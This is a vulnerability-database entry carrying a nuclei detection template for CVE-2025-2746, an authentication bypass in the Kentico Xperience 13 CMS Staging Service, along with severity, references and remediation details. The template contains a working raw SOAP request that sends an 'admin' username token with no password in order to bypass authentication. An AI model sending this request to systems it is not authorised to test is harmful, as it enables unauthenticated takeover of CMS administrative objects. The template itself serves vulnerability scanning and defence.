Lucene search
K

Kentico Xperience 13 CMS - Staging Service Authentication Bypass (WT-2025-0011)

šŸ—“ļøĀ 05 Jul 2026Ā 03:01:21Reported byĀ ProjectDiscoveryTypeĀ 
nuclei
Ā nuclei
šŸ”—Ā github.comšŸ‘Ā 16Ā Views

Kentico Xperience 13 CMS Staging Service authentication bypass allows bypass before hotfix 173; later fixes require a valid staging username, default admin.

Related
Refs
Code
id: CVE-2025-2746

info:
  name: Kentico Xperience 13 CMS - Staging Service Authentication Bypass (WT-2025-0011)
  author: DhiyaneshDK
  severity: critical
  description: |
    Before Kentico Xperience 13 Hotfix 173, this vulnerability can be exploited with any username provided. For Hotfix >= 173 and < 178, this vulnerability can be exploited only if you provide a valid Staging Service username (default: admin)
  impact: |
    Unauthenticated attackers can bypass authentication in the Staging Service using any username (or valid username depending on hotfix version), potentially gaining control of administrative objects and compromising the entire CMS.
  remediation: |
    Upgrade to Kentico Xperience 13 Hotfix 178 or later that properly validates Staging Service authentication.
  reference:
    - https://github.com/watchtowrlabs/kentico-xperience13-AuthBypass-wt-2025-0011
    - https://devnet.kentico.com/download/hotfixes
    - https://labs.watchtowr.com/bypassing-authentication-like-its-the-90s-pre-auth-rce-chain-s-in-kentico-xperience-cms/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-2746
    cwe-id: CWE-287
    epss-score: 0.58431
    epss-percentile: 0.98984
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="Kentico-CMS"
  tags: cve,cve2025,kentico,stag,auth-bypass,xperience13,vuln,kev,vkev

variables:
  rand: "{{to_lower(rand_text_alpha(32))}}"

http:
  - raw:
      - |
        POST /CMSPages/Staging/SyncServer.asmx HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: text/xml; charset=utf-8
        SOAPAction: http://localhost/SyncWebService/SyncServer/ProcessSynchronizationTaskData

        <?xml version="1.0" encoding="utf-8"?>
            <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
                <soap:Header>
                    <wsse:Security xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">
                        <wsse:UsernameToken>
                            <wsse:Username>admin</wsse:Username>
                        </wsse:UsernameToken>
                    </wsse:Security>
                </soap:Header>
                <soap:Body>
                    <ProcessSynchronizationTaskData xmlns="http://localhost/SyncWebService/SyncServer">
                        <stagingTaskData><![CDATA[<{{rand}}>]]></stagingTaskData>
                    </ProcessSynchronizationTaskData>
                </soap:Body>
            </soap:Envelope>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{rand}}"
          - "<wsa:Action>"
        condition: and

      - type: word
        part: body
        words:
          - "Site not running"
          - "SyncServer.ErrorLicense"
          - "SyncServer.ErrorServiceNotEnabled"
          - "Staging service is not enabled on this server"
          - "Staging does not work with blank password"
          - "Missing X509 certificate token"
          - "The security token could not be authenticated or authorized"
        condition: or
        negative: true

      - type: word
        part: content_type
        words:
          - "text/xml"
# digest: 4a0a00473045022100c93985cca8ba9c37d3bfc54436d702bed4caa2d24df03e5a4e90e4e881e1b5d002206f3387b3227951a5ab697fe33082151f291bd712942b7dc44ac925924ee7e48e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.19.8
EPSS0.58431
SSVC
16